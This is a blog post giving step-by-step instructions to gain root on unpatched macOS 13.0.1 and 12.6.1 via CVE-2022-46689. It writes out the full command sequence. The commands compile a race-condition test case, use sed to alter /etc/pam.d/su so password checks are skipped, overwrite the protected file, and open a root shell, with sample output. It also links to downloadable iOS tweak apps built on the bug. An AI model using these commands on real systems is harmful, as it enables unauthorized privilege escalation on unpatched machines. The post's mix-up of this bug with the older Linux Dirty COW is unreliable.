thetechpapa – Blog for tech support

The Tech Papa - All tech updates about Apple, iOS, Windows, Google, Android, Amazon, Home Automation, Solar and Tech Reviews

Get root access on macOS 13.0.1 with Dirty Cow Bug (CVE-2022-46689)

Dirty Cow Bug - thetechpapa.com
By adminPosted on Posted in AppleTagged , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

Last Updated on 2 years by admin

Using the testcase from Apple’s XNU source, get root access on macOS 13.0.1 via the Dirty Cow Bug(CVE-2022-46689).

How to Root macOS

Clone the extracted test case on an iMac running macOS 13.0.1 or 12.6.1 (or lower).

Get MacDirtyCowDemo from GitHub

Run the command given below

clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

You should see the result as

% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#

Tested on macOS 13 beta (22A5266r) with SIP disabled (it should not make any difference even with SIP enabled).

If your copy of macOS 13.1 or 12.6.2 has been patched correctly, it should read

$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

and using “su” should continue to request a password.

Because of the Sealed System Volume, running this on any file on the /System disk only modifies the file temporarily. It is undone when the computer is restarted. If you use it on a file that is on a writeable drive, the modification will remain after a reboot.

Can my iMac be vulnerable to the Dirty Cow bug (Dirty copy-on-write bug)?

You should be alright if you have installed the most recent macOS update (macOS 13.1 / 12.6.2 / 11.7.2). If not, get the update rolling right now.

Will the Dirty Cow bug result in a jailbreak for iOS?

The information and facts suggest that the Dirty Cow Bug only impacts processes that are operating in userspace. For jailbreaks, a kernel vulnerability is necessary. Additionally, according to the Apple Security release notes, this issue may allow “arbitrary code with kernel privileges,” while in actuality, we are unable to confirm this. Rejecting the idea that a jailbreak will be available is preferable, as a jailbreak using the Dirty Cow Flow is unlikely to be successful. However, different mindsets might have various points of view.

Jailbreak communities may still create something amazing for iOS using the bug. We are unsure of what they will develop or what they will replace, despite the fact that codesigning should safeguard all executables and libraries. Please let us know what you find.

On the other hand, there are tweaks that have been developed using the Dirty Cow flow. Here are a few popular apps created.

DirtyCow Tweak Apps for iOS – iPhone / iPad (Sideload with any method you like)

Dirty Cow Tweaks -Download Online directly, no PC Required

Click Here for NO PC DirtyCow Tweaks

Credits

Project Zero’s Ian Beer for identifying the problem. Looking forward to reading your writeup!

For the test case, Apple. (I didn’t change anything: I just added the command line parameter to control what to overwrite.)

For the /etc/pam.d hack to turn off password checking, thanks to SSLab@Gatech.

(Visited 340 times, 1 visits today)
Get root access on macOS 13.0.1 with Dirty Cow Bug (CVE-2022-46689)
Scroll to top